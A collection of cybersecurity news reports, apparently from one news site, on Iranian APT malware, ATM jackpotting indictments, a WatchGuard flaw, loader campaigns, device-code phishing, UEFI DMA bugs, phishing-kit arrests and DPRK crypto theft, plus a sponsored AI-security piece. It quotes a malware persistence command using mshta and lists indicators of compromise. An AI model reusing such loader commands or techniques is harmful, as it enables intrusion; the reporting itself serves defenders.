Author: Mark

Threat hunters have discerned new activity associated with an Iranian threat actor known as Infy (aka Prince of Persia), nearly five years after the hacking group was observed targeting victims in Sweden, the Netherlands, and Turkey.

“The scale of Prince of Persia’s activity is more significant than we originally anticipated,” Tomer Bar, vice president of security research at SafeBreach, said in a technical breakdown shared with The Hacker News. “This threat group is still active, relevant, and dangerous.”

Infy is one of the oldest advanced persistent threat (APT) actors in existence, with evidence of early activity dating all the way back to December 2004, according to a report released by Palo Alto Networks Unit 42 in May 2016 that was also authored by Bar, along with researcher Simon Conant.

The group has also managed to remain elusive, attracting little attention, unlike other Iranian groups such as Charming Kitten, MuddyWater, and OilRig. Attacks mounted by the group have prominently leveraged two strains of malware: a downloader and victim profiler named Foudre that delivers a second-stage implant called Tonnerre to extract data from high-value machines. It’s assessed that Foudre is distributed via phishing emails.

The latest findings from SafeBreach have uncovered a covert campaign that has targeted victims across Iran, Iraq, Turkey, India, and Canada, as well as Europe, using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50). The latest version of Tonnerre was detected in September 2025.

The attack chains have also witnessed a shift from a macro-laced Microsoft Excel file to embedding an executable within such documents to install Foudre. Perhaps the most notable aspect of the threat actor’s modus operandi is the use of a domain generation algorithm (DGA) to make its command-and-control (C2) infrastructure more resilient.

The latest version of Tonnerre, on the other hand, includes a mechanism to contact a Telegram group (named “سرافراز,” meaning “proudly” in Persian) through the C2 server. The group has two members: a Telegram bot “@ttestro1bot” that’s likely used to issue commands and collect data, and a user with the handle “@ehsan8999100.”

While the use of the messaging app for C2 is not uncommon, what’s notable is that the information about the Telegram group is stored in a file named “tga.adr” within a directory called “t” in the C2 server. It’s worth noting that the download of the “tga.adr” file can only be triggered for a specific list of victim GUIDs.

Also discovered by the cybersecurity company are other older variants used in Foudre campaigns between 2017 and 2020 –

• A version of Foudre camouflaged as Amaq News Finder to download and execute the malware
• A new version of a trojan called MaxPinner that’s downloaded by Foudre version 24 DLL to spy on Telegram content
• A variation of malware called Deep Freeze, similar to Amaq News Finder, is used to infect victims with Foudre
• An unknown malware called Rugissement

“Despite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite,” SafeBreach said. “Our ongoing research campaign into this prolific and elusive group has highlighted critical details about their activities, C2 servers, and identified malware variants in the last three years.”

The disclosure comes as DomainTools’ continued analysis of Charming Kitten leaks has painted the picture of a hacking group that functions more like a government department, while running “espionage operations with clerical precision.” The threat actor has also been unmasked as behind the Moses Staff persona.

“APT 35, the same administrative machine that runs Tehran’s long-term credential-phishing operations, also ran the logistics that powered Moses Staff’s ransomware theatre,” the company said.

“The supposed hacktivists and the government cyber-unit share not only tooling and targets but also the same accounts-payable system. The propaganda arm and the espionage arm are two products of a single workflow: different “projects” under the same internal ticketing regime.”

Dec 20, 2025Ravie LakshmananCybercrime / ATM Security

The U.S. Department of Justice (DoJ) this week announced the indictment of 54 individuals in connection with a multi-million dollar ATM jackpotting scheme.

The large-scale conspiracy involved deploying malware named Ploutus to hack into automated teller machines (ATMs) across the U.S. and force them to dispense cash. The indicted members are alleged to be part of Tren de Aragua (TdA, Spanish for “the train of Aragua”), a Venezuelan gang designated a foreign terrorist organization by the U.S. State Department.

In July 2025, the U.S. government announced sanctions against the group’s head, Hector Rusthenford Guerrero Flores (aka Niño Guerrero), and five other key members for their involvement in the “illicit drug trade, human smuggling and trafficking, extortion, sexual exploitation of women and children, and money laundering, among other criminal activities.”

The Justice Department said an indictment returned on December 9, 2025, has charged a group of 22 people for supposedly committing bank fraud, burglary, and money laundering. Prosecutors also alleged that TdA has leveraged jackpotting schemes to siphon millions of dollars in the U.S. and transfer the ill-gotten proceeds among its members and associates.

Another 32 individuals have been charged in a second, related indictment returned on October 21, 2025, accusing them of “one count of conspiracy to commit bank fraud, one count of conspiracy to commit bank burglary and computer fraud, 18 counts of bank fraud, 18 counts of bank burglary, and 18 counts of damage to computers.”

If convicted, the defendants could face a maximum penalty of anywhere between 20 and 335 years in prison.

“These defendants employed methodical surveillance and burglary techniques to install malware into ATM machines, and then steal and launder money from the machines, in part to fund terrorism and the other far-reaching criminal activities of TDA, a designated Foreign Terrorist Organization,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

The jackpotting operation is said to have relied on the TdA recruiting an unspecified number of individuals to deploy the malware across the nation. These individuals would then conduct initial reconnaissance to assess external security measures installed at various ATMs and then attempt to open the ATM’s hood to check if they triggered any alarm or a law enforcement response.

Following this step, the threat actors would install Ploutus by either replacing the hard drive with one that came preloaded with the malicious program or by connecting a removable thumb drive. The malware is equipped to issue unauthorized commands associated with the Cash Dispensing Module of the ATM in order to force currency withdrawals.

“The Ploutus malware was also designed to delete evidence of malware in an effort to conceal, create a false impression, mislead, or otherwise deceive employees of the banks and credit unions from learning about the deployment of the malware on the ATM,” the DoJ said. “Members of the conspiracy would then split the proceeds in predetermined portions.”

Ploutus was first detected in Mexico in 2013. In a 2014 report, Symantec detailed how a weakness in Windows XP-based ATMs could be exploited to allow cybercriminals to withdraw cash simply by sending an SMS to compromised ATMs. A subsequent analysis from FireEye (now part of Google Mandiant) in 2017 detailed its ability to control Diebold ATMs and run on various Windows versions.

“Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes,” it explained at the time. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM.”

According to the agency, a total of 1,529 jackpotting incidents have been recorded in the U.S. since 2021, with about $40.73 million lost to the international criminal network as of August 2025.

“Many millions of dollars were drained from ATM machines across the United States as a result of this conspiracy, and that money is alleged to have gone to Tren de Aragua leaders to fund their terrorist activities and purposes,” U.S. Attorney Lesley Woods said.

Dec 19, 2025Ravie LakshmananVulnerability / Network Security

WatchGuard has released fixes to address a critical security flaw in Fireware OS that it said has been exploited in real-world attacks.

Tracked as CVE-2025-14733 (CVSS score: 9.3), the vulnerability has been described as a case of out-of-bounds write affecting the iked process that could allow a remote unauthenticated attacker to execute arbitrary code.

“This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer,” the company said in a Thursday advisory.

“If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.”

The vulnerability impacts the following versions of Fireware OS –

• 2025.1 – Fixed in 2025.1.4
• 12.x – Fixed in 12.11.6
• 12.5.x (T15 & T35 models) – Fixed in 12.5.15
• 12.3.1 (FIPS-certified release) – Fixed in 12.3.1_Update4 (B728352)
• 11.x (11.10.2 up to and including 11.12.4_Update1) – End-of-Life

WatchGuard acknowledged that it has observed threat actors actively attempting to exploit this vulnerability in the wild, with the attacks originating from the following IP addresses –

Interestingly, the IP address “199.247.7[.]82” was also flagged by Arctic Wolf earlier this week as linked to the exploitation of two recently disclosed security vulnerabilities in Fortinet FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager (CVE-2025-59718 and CVE-2025-59719, CVSS scores: 9.8).

The Seattle-based company has also shared multiple indicators of compromise (IoCs) that device owners can use to determine if their own instances have been infected –

• A log message stating “Received peer certificate chain is longer than 8. Reject this certificate chain” when the Firebox receives an IKE2 Auth payload with more than 8 certificates
• An IKE_AUTH request log message with an abnormally large CERT payload size (greater than 2000 bytes)
• During a successful exploit, the iked process will hang, interrupting VPN connections
• After a failed or successful exploit, the IKED process will crash and generate a fault report on the Firebox

The disclosure comes a little over a month after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another critical WatchGuard Fireware OS flaw (CVE-2025-9242, CVSS score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation.

It’s currently not known if these two sets of attacks are related. Users are advised to apply the updates as soon as possible to secure against the threat.

As temporary mitigation for devices with vulnerable Branch Office VPN (BOVPN) configurations, the company has urged administrators to disable dynamic peer BOVPNs, create an alias that includes the static IP addresses of remote BOVPN peers, add new firewall policies that allow access from the alias, and disable the default built-in policies that handle VPN traffic.

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader.

The campaign “uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,” Cyderes Howler Cell Threat Intelligence team said in an analysis.

CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.

The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive.

To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It’s configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain.

It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI). If the service is detected, the persistence command is tweaked to “cmd.exe /c start /b mshta.exe <URL>.” Otherwise, it directly reaches out to the URL using “mshta.exe.”

CountLoader is equipped to profile the compromised host and fetch the next-stage payload. The newest version of the malware adds capabilities to propagate via removable USB drives and execute the malware directly in memory via “mshta.exe” or PowerShell. The complete list of supported features is as follows-

• Download an executable from a provided URL and execute it
• Download a ZIP archive from a provided URL and executes either a Python-based module or an EXE file present within it
• Download a DLL from a provided URL and run it via “rundll32.exe”
• Download an MSI installer package and install it
• Remove a scheduled task used by the loader
• Collect and exfiltrate extensive system information
• Spread via removable media by creating malicious shortcuts (LNK) next to their hidden original counterparts that, when launched, execute the original file and run the malware via “mshta.exe” with a C2 parameter
• Directly launch “mshta.exe” against a provided URL
• Execute a remote PowerShell payload in memory

In the attack chain observed by Cyderes, the final payload deployed by the CountLoader is an information stealer known as ACR Stealer, which is equipped to harvest sensitive data from infected hosts.

“This campaign highlights CountLoader’s ongoing evolution and increased sophistication, reinforcing the need for proactive detection and layered defense strategies,” Cyderes said. “Its ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.”

YouTube Ghost Network Delivers GachiLoader

The disclosure comes as Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js. The malware is distributed by means of the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution.

“One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection,” security researchers Sven Rath and Jaromír Hořejší said. “This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload.”

As many as 100 YouTube videos have been flagged as part of the campaign, amassing approximately 220.000 views. These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google.

In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.

It also verifies if it’s running in an elevated context by executing the “net session” command. In the event the execution fails, it attempts to start itself with admin privileges, which, in turn, triggers a User Account Control (UAC) prompt. There are high chances that the victim will allow it to continue, as the malware is likely to be distributed through fake installers for popular software, as outlined in the case of CountLoader.

In the last phase, the malware attempts to kill “SecHealthUI.exe,” a process associated with Microsoft Defender, and configures Defender exclusions to avoid the security solution from flagging malicious payloads staged in certain folders (e.g., C:Users, C:ProgramData, and C:Windows).

GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named “kidkadi.node,” which then loads the main malware by abusing Vectored Exception Handling.

“The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection.”

Dec 19, 2025Ravie LakshmananCybersecurity / Cloud Security

A suspected Russia-aligned group has been attributed to a phishing campaign that employs device code authentication workflows to steal victims’ Microsoft 365 credentials and conduct account takeover attacks.

The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare.

The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe.

“Typically, these compromised email addresses are used to conduct benign outreach and rapport building related to the targets’ area of expertise to ultimately arrange a fictitious meeting or interview,” the enterprise security company said.

As part of these efforts, the adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender’s Microsoft OneDrive account and instructs the victim to copy the provided code and click “Next” to access the supposed document.

However, doing so redirects the user to the legitimate Microsoft device code login URL, where, once the previously provided code is entered, it causes the service to generate an access token that can then be recovered by the three actors to take control of the victim account.

Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. Over the past couple of months, Amazon Threat Intelligence and Volexity have warned of continued attacks mounted by Russian threat actors by abusing the device code authentication flow.

Proofpoint said UNK_AcademicFlare is likely a Russia-aligned threat actor given its targeting of Russia-focused specialists at multiple think tanks and Ukrainian government and energy sector organizations.

Data from the company shows that multiple threat actors, both state-aligned and financially-motivated, have latched onto the phishing tactic to deceive users into giving them access to Microsoft 365 accounts. This includes an e-crime group named TA2723 that has used salary-related lures in phishing emails to direct users to fake landing pages and trigger device code authorization.

The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish.

“Similar to SquarePhish, the tool is designed to be user-friendly and does not require advanced technical expertise, lowering the barrier for entry and enabling even low-skilled threat actors to conduct sophisticated phishing campaigns,” Proofpoint said. “The ultimate objective is unauthorized access to sensitive personal or organizational data, which can be exploited for credential theft, account takeover, and further compromise.”

To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that’s not feasible, it’s advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges.

Dec 19, 2025Ravie LakshmananFirmware Security / Vulnerability

Certain motherboard models from vendors like ASRock, ASUSTeK Computer, GIGABYTE, and MSI are affected by a security vulnerability that leaves them susceptible to early-boot direct memory access (DMA) attacks across architectures that implement a Unified Extensible Firmware Interface (UEFI) and input–output memory management unit (IOMMU).

UEFI and IOMMU are designed to enforce a security foundation and prevent peripherals from performing unauthorized memory accesses, effectively ensuring that DMA-capable devices can manipulate or inspect system memory before the operating system is loaded.

The vulnerability, discovered by Nick Peterson and Mohamed Al-Sharifi of Riot Games in certain UEFI implementations, has to do with a discrepancy in the DMA protection status. While the firmware indicates that DMA protection is active, it fails to configure and enable the IOMMU during the critical boot phase.

“This gap allows a malicious DMA-capable Peripheral Component Interconnect Express (PCIe) device with physical access to read or modify system memory before operating system-level safeguards are established,” the CERT Coordination Center (CERT/CC) said in an advisory.

“As a result, attackers could potentially access sensitive data in memory or influence the initial state of the system, thus undermining the integrity of the boot process.”

Successful exploitation of the vulnerability could allow a physically present attacker to enable pre-boot code injection on affected systems running unpatched firmware and access or alter system memory via DMA transactions, much before the operating system kernel and its security features are loaded.

The vulnerabilities that enable a bypass of early-boot memory protection are listed below –

• CVE-2025-14304 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting ASRock, ASRock Rack, and ASRock Industrial motherboards using Intel 500, 600, 700, and 800 series chipsets
• CVE-2025-11901 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting ASUS motherboards using Intel Z490, W480, B460, H410, Z590, B560, H510, Z690, B660, W680, Z790, B760, and W790 series chipsets
• CVE-2025-14302 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting GIGABYTE motherboards using Intel Z890, W880, Q870, B860, H810, Z790, B760, Z690, Q670, B660, H610, W790 series chipsets, and AMD X870E, X870, B850, B840, X670, B650, A620, A620A, and TRX50 series chipsets (Fix for TRX50 planned for Q1 2026)
• CVE-2025-14303 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting MSI motherboards using Intel 600 and 700 series chipsets

With impacted vendors releasing firmware updates to correct the IOMMU initialization sequence and enforce DMA protections throughout the boot process, it’s essential that end users and administrators apply them as soon as they are available to stay protected against the threat.

“In environments where physical access cannot be fully controlled or relied on, prompt patching and adherence to hardware security best practices are especially important,” CERT/CC said. “Because the IOMMU also plays a foundational role in isolation and trust delegation in virtualized and cloud environments, this flaw highlights the importance of ensuring correct firmware configuration even on systems not typically used in data centers.”

Dec 19, 2025Ravie LakshmananCybercrime / Law Enforcement

Authorities in Nigeria have announced the arrest of three “high-profile internet fraud suspects” who are alleged to have been involved in phishing attacks targeting major corporations, including the main developer behind the RaccoonO365 phishing-as-a-service (PhaaS) scheme.

The Nigeria Police Force National Cybercrime Centre (NPF–NCCC) said investigations conducted in collaboration with Microsoft and the Federal Bureau of Investigation (FBI) led to the identification of Okitipi Samuel, also known as Moses Felix, as the principal suspect and developer of the phishing infrastructure.

“Investigations reveal that he operated a Telegram channel through which phishing links were sold in exchange for cryptocurrency and hosted fraudulent login portals on Cloudflare using stolen or fraudulently obtained email credentials,” the NPF said in a post shared on social media.

In addition, laptops, mobile devices, and other digital equipment linked to the operation have been seized following search operations conducted at their residences. The two other arrested individuals have no connection to the creation or operation of the PhaaS service, per the NPF.

RaccoonO365 is the name assigned to a financially motivated threat group behind a PhaaS toolkit that enables bad actors to conduct credential harvesting attacks by serving phishing pages mimicking Microsoft 365 login pages. Microsoft is tracking the threat actor under the moniker Storm-2246.

Back in September 2025, the tech giant said it worked with Cloudflare to seize 338 domains used by RaccoonO365. The phishing infrastructure attributed to the toolkit is estimated to have led to the theft of at least 5,000 Microsoft credentials from 94 countries since July 2024.

The NPF said RaccoonO365 was used to set up fraudulent Microsoft login portals aimed at stealing user credentials and using them to gain unlawful access to the email platforms of corporate, financial, and educational institutions. The joint probe has uncovered multiple incidents of unauthorized Microsoft 365 account access between January and September 2025 that originated from phishing messages crafted to mimic legitimate Microsoft authentication pages.

These activities led to business email compromise, data breaches, and financial losses across multiple jurisdictions, the NPF added.

A civil lawsuit filed by Microsoft and Health-ISAC in September has accused defendants Joshua Ogundipe and four other John Does of hosting a cybercriminal operation by “selling, distributing, purchasing, and implementing” the phishing kit to facilitate sophisticated spear-phishing and siphon sensitive information.

The stolen data is then used to fuel more cybercrimes, including business email compromise, financial fraud, and ransomware attacks, as well as commit intellectual property violations.

The development comes as Google filed a lawsuit against the operators of the Darcula PhaaS service, naming Chinese national Yucheng Chang as the group’s leader along with 24 other members. The company is seeking a court order to seize the group’s server infrastructure that has been behind a massive smishing wave impersonating U.S. government entities.

News of the lawsuit was first reported by NBC News on December 17, 2025. The development comes a little over a month after Google also sued China-based hackers associated with another PhaaS service known as Lighthouse that’s believed to have impacted over 1 million users across 120 countries.

Within the past year, artificial intelligence copilots and agents have quietly permeated the SaaS applications businesses use every day. Tools like Zoom, Slack, Microsoft 365, Salesforce, and ServiceNow now come with built-in AI assistants or agent-like features. Virtually every major SaaS vendor has rushed to embed AI into their offerings.

The result is an explosion of AI capabilities across the SaaS stack, a phenomenon of AI sprawl where AI tools proliferate without centralized oversight. For security teams, this represents a shift. As these AI copilots scale up in use, they are changing how data moves through SaaS. An AI agent can connect multiple apps and automate tasks across them, effectively creating new integration pathways on the fly.

An AI meeting assistant might automatically pull in documents from SharePoint to summarize in an email, or a sales AI might cross-reference CRM data with financial records in real time. These AI data connections form complex, dynamic pathways that traditional static app models never had.

When AI Blends In – Why Traditional Governance Breaks

This shift has exposed a fundamental weakness in legacy SaaS security and governance. Traditional controls assumed stable user roles, fixed app interfaces, and human-paced changes. However, AI agents break those assumptions. They operate at machine speed, traverse multiple systems, and often wield higher-than-usual privileges to perform their job. Their activity tends to blend into normal user logs and generic API traffic, making it hard to distinguish an AI’s actions from a person’s.

Consider Microsoft 365 Copilot: when this AI fetches documents that a given user wouldn’t normally see, it leaves little to no trace in standard audit logs. A security admin might see an approved service account accessing files, and not realize it was Copilot pulling confidential data on someone’s behalf. Similarly, if an attacker hijacks an AI agent’s token or account, they can quietly misuse it.

Moreover, AI identities don’t behave like human users at all. They don’t fit neatly into existing IAM roles, and they often require very broad data access to function (far more than a single user would need). Traditional data loss prevention tools struggle because once an AI has wide read access, it can potentially aggregate and expose data in ways no simple rule would catch.

Permission drift is another challenge. In a static world, you might review integration access once a quarter. But AI integrations can change capabilities or accumulate access quickly, outpacing periodic reviews. Access often drifts silently when roles change or new features turn on. A scope that seemed safe last week might quietly expand (e.g., an AI plugin gaining new permissions after an update) without anyone realizing.

All these factors mean static SaaS security and governance tools are falling behind. If you’re only looking at static app configurations, predefined roles, and after-the-fact logs, you can’t reliably tell what an AI agent actually did, what data it accessed, which records it changed, or whether its permissions have outgrown policy in the interim.

A Checklist for Securing AI Copilots and Agents

Before introducing new tools or frameworks, security teams should pressure-test their current posture.

If several of these questions are difficult for you to answer, it’s a signal that static SaaS security models are no longer sufficient for AI tools.

Dynamic AI-SaaS Security – Guardrails for AI Apps

To address these gaps, security teams are beginning to adopt what can be described as dynamic AI-SaaS security.

In contrast to static security (which treats apps as siloed and unchanging), dynamic AI-SaaS security is a policy driven, adaptive guardrail layer that operates in real-time on top of your SaaS integrations and OAuth grants. Think of it as a living security layer that understands what your copilots and agents are doing moment-to-moment, and adjusts or intervenes according to policy.

Dynamic AI-SaaS security monitors AI agent activity across all your SaaS apps, watching for policy violations, abnormal behavior, or signs of trouble. Rather than relying on yesterday’s checklist of permissions, it learns and adapts to how an agent is actually being used.

A dynamic security platform will track an AI agent’s effective access. If the agent suddenly touches a system or dataset outside its usual scope, it can flag or block that in real-time. It can also detect configuration drift or privilege creep instantly and alert teams before an incident occurs.

Another hallmark of dynamic AI-SaaS security is visibility and auditability. Because the security layer mediates the AI’s actions, it keeps a detailed record of what the AI is doing across systems.

Every prompt, every file accessed, and every update made by the AI can be logged in structured form. This means that if something does go wrong, say an AI makes an unintended change or accesses a forbidden file, the security team can trace exactly what happened and why.

Dynamic AI-SaaS security platforms leverage automation and AI themselves to keep up with the torrent of events. They learn normal patterns of agent behavior and can prioritize true anomalies or risks so that security teams aren’t drowning in alerts.

They might correlate an AI’s actions across multiple apps to understand the context and flag only genuine threats. This proactive stance helps catch issues that traditional tools would miss, whether it’s a subtle data leak via an AI or a malicious prompt injection causing an agent to misbehave.

Conclusion – Embracing Adaptive Guardrails

As AI copilots take on a bigger role in our SaaS workflows, security teams should think about evolving their strategy in parallel. The old model of set-and-forget SaaS security, with static roles and infrequent audits, simply can’t keep up with the speed and complexity of AI activity.

The case for dynamic AI-SaaS security is ultimately about maintaining control without stifling innovation. With the right dynamic security platform in place, organizations can confidently adopt AI copilots and integrations, knowing they have real-time guardrails to prevent misuse, catch anomalies, and enforce policy.

Dynamic AI-SaaS security platforms (like Reco) are emerging to deliver these capabilities out-of-the-box, from monitoring of AI privileges to automated incident response. They act as that missing layer on top of OAuth and app integrations, adapting on the fly to what agents are doing and ensuring nothing falls through the cracks.

Figure 1: Reco’s generative AI application discovery

For security leaders watching the rise of AI copilots, SaaS security can no longer be static. By embracing a dynamic model, you equip your organization with living guardrails that let you ride the AI wave safely. It’s an investment in resilience that will pay off as AI continues to transform the SaaS ecosystem.

Interested in how dynamic AI-SaaS security could work for your organization? Consider exploring platforms like Reco that are built to provide this adaptive guardrail layer.

Request a Demo: Get Started With Reco.

Dec 18, 2025Ravie LakshmananCybersecurity / Hacking News

This week’s ThreatsDay Bulletin tracks how attackers keep reshaping old tools and finding new angles in familiar systems. Small changes in tactics are stacking up fast, and each one hints at where the next big breach could come from.

From shifting infrastructures to clever social hooks, the week’s activity shows just how fluid the threat landscape has become.

Here’s the full rundown of what moved in the cyber world this week.

The patterns behind these stories keep repeating — faster code, smarter lures, and fewer pauses between discovery and abuse. Each case adds another piece to the wider map of how attacks adapt when attention fades.

Next week will bring a fresh set of shifts, but for now, these are the signals worth noting. Stay sharp, connect the dots, and watch what changes next.

That’s all for this edition of the ThreatsDay Bulletin — the pulse of what’s moving beneath the surface every Thursday.

Threat actors with ties to the Democratic People’s Republic of Korea (DPRK or North Korea) have been instrumental in driving a surge in global cryptocurrency theft in 2025, accounting for at least $2.02 billion out of more than $3.4 billion stolen from January through early December.

The figure represents a 51% increase year-over-year and $681 million more than 2024, when the threat actors stole $1.3 billion, according to Chainalysis’ Crypto Crime Report shared with The Hacker News.

“This marks the most severe year on record for DPRK crypto theft in terms of value stolen, with DPRK attacks also accounting for a record 76% of all service compromises,” the blockchain intelligence company said. “Overall, 2025’s numbers bring the lower-bound cumulative estimate for cryptocurrency funds stolen by the DPRK to $6.75 billion.”

The February compromise of cryptocurrency exchange Bybit alone is responsible for $1.5 billion of the $2.02 billion plundered by North Korea. The attack was attributed to a threat cluster known as TraderTraitor (aka Jade Sleet and Slow Pisces). An analysis published by Hudson Rock earlier this month linked a machine infected with Lumma Stealer to infrastructure associated with the Bybit hack based on the presence of the email address “trevorgreer9312@gmail[.]com.”

The cryptocurrency thefts are part of a broader series of attacks conducted by the North Korea-backed hacking group called Lazarus Group over the past decade. The adversary is also believed to be involved in the theft of $36 million worth of cryptocurrency from South Korea’s largest cryptocurrency exchange, Upbit, last month.

Lazarus Group is affiliated with Pyongyang’s Reconnaissance General Bureau (RGB). It’s estimated to have siphoned no less than $200 million from over 25 cryptocurrency heists between 2020 and 2023.

The nation-state adversary is one of the most prolific hacking groups that also has a track record of orchestrating a long-running campaign referred to as Operation Dream Job, in which prospective employees working in defense, manufacturing, chemical, aerospace, and technology sectors are approached via LinkedIn or WhatsApp with lucrative job opportunities to trick them into downloading and running malware such as BURNBOOK, MISTPEN, and BADCALL, the last of which also comes in a Linux version.

A second approach adopted by North Korean threat actors is to embed information technology (IT) workers inside companies across the world under false pretenses, either in an individual capacity or through front companies like DredSoftLabs and Metamint Studio that are set up for this purpose. This also includes gaining privileged access to crypto services and enabling high‑impact compromises. The fraudulent operation has been nicknamed Wagemole.

“Part of this record year likely reflects an expanded reliance on IT worker infiltration at exchanges, custodians, and Web3 firms, which can accelerate initial access and lateral movement ahead of large‑scale theft,” Chainalysis said.

Regardless of the method used, the stolen funds are routed through Chinese-language money movement and guarantee services, as well as cross-chain bridges, mixers, and specialized marketplaces like Huione to launder the proceeds. What’s more, the pilfered assets follow a structured, multi-wave laundering pathway that unfolds over approximately 45 days following the hacks –

• Wave 1: Immediate Layering (Days 0-5), which involves immediate distancing of funds from the theft source using DeFi protocols and mixing services
• Wave 2: Initial Integration (Days 6-10), which involves shifting the funds to cryptocurrency exchanges, second-tier mixing services, and cross-chain bridges like XMRt
• Wave 3: Final Integration (Days 20-45), which involves using services that facilitate ultimate conversion to fiat currency or other assets

“Their heavy use of professional Chinese-language money laundering services and over-the-counter (OTC) traders suggests that DPRK threat actors are tightly integrated with illicit actors across the Asia-Pacific region, and is consistent with Pyongyang’s historical use of China-based networks to gain access to the international financial system,” the company said.

The disclosure comes as Minh Phuong Ngoc Vong, a 40-year-old Maryland man, has been sentenced to 15 months in prison for his role in the IT worker scheme by allowing North Korean nationals based in Shenyang, China, to use his identity to land jobs at several U.S. government agencies, per the U.S. Department of Justice (DoJ).

Between 2021 and 2024, Vong used fraudulent misrepresentations to obtain employment with at least 13 different U.S. companies, including landing a contract at the Federal Aviation Administration (FAA). In all, Vong was paid more than $970,000 in salary for software development services that were carried out by overseas conspirators.

“Vong conspired with others, including John Doe, aka William James, a foreign national living in Shenyang, China, to defraud U.S. companies into hiring Vong as a remote software developer,” the DoJ said. “After securing these jobs through materially false statements about his education, training, and experience, Vong allowed Doe and others to use his computer access credentials to perform the remote software development work and receive payment for that work.”

The IT worker scheme appears to be undergoing a shift in strategy, with DPRK-linked actors increasingly acting as recruiters to enlist collaborators through platforms like Upwork and Freelancer to further scale the operations.

“These recruiters approach targets with a scripted pitch, requesting ‘collaborators’ to help bid on and deliver projects. They provide step-by-step instructions for account registration, identity verification, and credential sharing,” Security Alliance said in a report published last month.

“In many cases, victims ultimately surrender full access to their freelance accounts or install remote-access tools such as AnyDesk or Chrome Remote Desktop. This enables the threat actor to operate under the victim’s verified identity and IP address, allowing them to bypass platform verification controls and conduct illicit activity undetected.”